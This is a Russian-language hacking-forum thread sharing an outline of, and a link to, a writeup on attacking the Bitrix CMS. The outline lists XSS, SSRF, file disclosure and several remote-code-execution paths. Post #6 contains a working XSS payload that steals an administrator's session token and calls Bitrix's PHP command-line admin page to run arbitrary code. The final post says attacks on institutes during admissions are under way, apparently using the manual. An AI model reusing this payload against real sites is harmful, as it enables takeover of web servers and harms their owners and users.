Уязвимости и атаки на CMS Bitrix

Discussion in 'Статьи' started by crlf, 23 May 2022.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Code:
    • Отказ от ответственности
    • Предисловие
    • Введение
    1.    Особенности
        1.1.    Разнообразие версий
        1.2.    Встроенный WAF
        1.3.    CSRF токены
        1.4.    Множественные эндпоинты для авторизации
            1.4.1.    Standalone скрипты
            1.4.2.    404 Not Found
        1.5.    Многосайтовость
        1.6.    Многороутерность
        1.7.    Remeberme куки
        1.8.    Register Globals
        1.9.    Лицензионные ключи
        1.10.    Ключ подписи данных
        1.11.    Интересные системные директории
        1.12.    RCE by design
    2.    Уязвимости
        2.1.    Full Path Disclosure
        2.2.    Content Spoofing ( mobileapp.list )
        2.3.    Content Spoofing ( pg.php )
        2.4.    Content Spoofing ( rest.marketplace.detail )
        2.5.    Account Enumeration ( UIDH )
        2.6.    Open Redirect ( LocalRedirect )
        2.7.    Reflected XSS ( map.google.view )
        2.8.    Reflected XSS ( photogallery_user )
        2.9.    Server-Side Request Forgery ( main.urlpreview )
        2.10.    Server-Side Request Forgery ( html_editor_action.php )
        2.11.    Local File Disclosure / Include ( virtual_file_system.php )
        2.12.    Arbitrary Object Instantiation ( vote/uf.php )
        2.13.    Arbitrary File Write ( html_editor_action.php )
    3.    Методы атак
        3.1.    RCE via PHP Object Injection ( html_editor_action.php )
            3.1.1.    Gadget chain
            3.1.2.    Обход "фикса"
        3.2.    RCE via SQL Injection ( UIDH )
        3.3.    RCE via PHP Object Injection ( signer_default_key )
        3.4.    RCE via PHP Object Injection ( site_checker.php )
    • Послесловие
    • Ссылки
    
    https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf
     
    #1 crlf, 23 May 2022
    Last edited: 13 Jul 2022
  2. Bo0oM

    Bo0oM Member

    Joined:
    26 Dec 2009
    Messages:
    2
    Likes Received:
    35
    Reputations:
    21
    Лучший
     
    crlf likes this.
  3. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Удивил, в очередной раз.
    Даже не ресерчами, к ним уже привыкли, а что хватило терпения оформить это по красоте.
    Большой труд, отличная работа.

    Но боюсь представить какого цвета у тебя глаза, после всего этого.
    Наверное даже не красные, а темно лиловые.

    А может просто уставшие, но довольные.
     
  4. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    51
    Likes Received:
    21
    Reputations:
    11
    Благодарю за качественный, а главное полезный материал.
    Воистину титанический труд.
     
    crlf likes this.
  5. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Полезная нагрузка, для выполнения произвольного PHP кода, через XSS, при атаке на администратора CMS Bitrix.
    HTML:
    <script>
      xhr = new XMLHttpRequest();
      xhr.withCredentials = true;
      xhr.open('GET', '/bitrix/tools/composite_data.php', false);
      xhr.onreadystatechange = function() {
        if(xhr.readyState == XMLHttpRequest.DONE){
        match = xhr.responseText.match(/'bitrix_sessid':'(.+?)'/);
        sessId = match[1];
        }
      };
      xhr.send();
     
      xhr.open('POST', '/bitrix/admin/php_command_line.php?lang=ru&sessid='+sessId, false);
      xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      xhr.send("query=phpinfo()%3B&result_as_text=y&ajax=y");
    </script>
     
    _________________________
    #6 winstrool, 25 Apr 2023
    Last edited: 25 Apr 2023
    Spinus, eminlayer7788 and alexzir like this.
  7. Spinus

    Spinus Level 8

    Joined:
    23 Sep 2018
    Messages:
    499
    Likes Received:
    2,924
    Reputations:
    12
    На этой неделе пошли атаки на институты. Горячая пора - приемная комиссия, а тут такая жопа. Админы воют. Видимо мануал зашел в тему.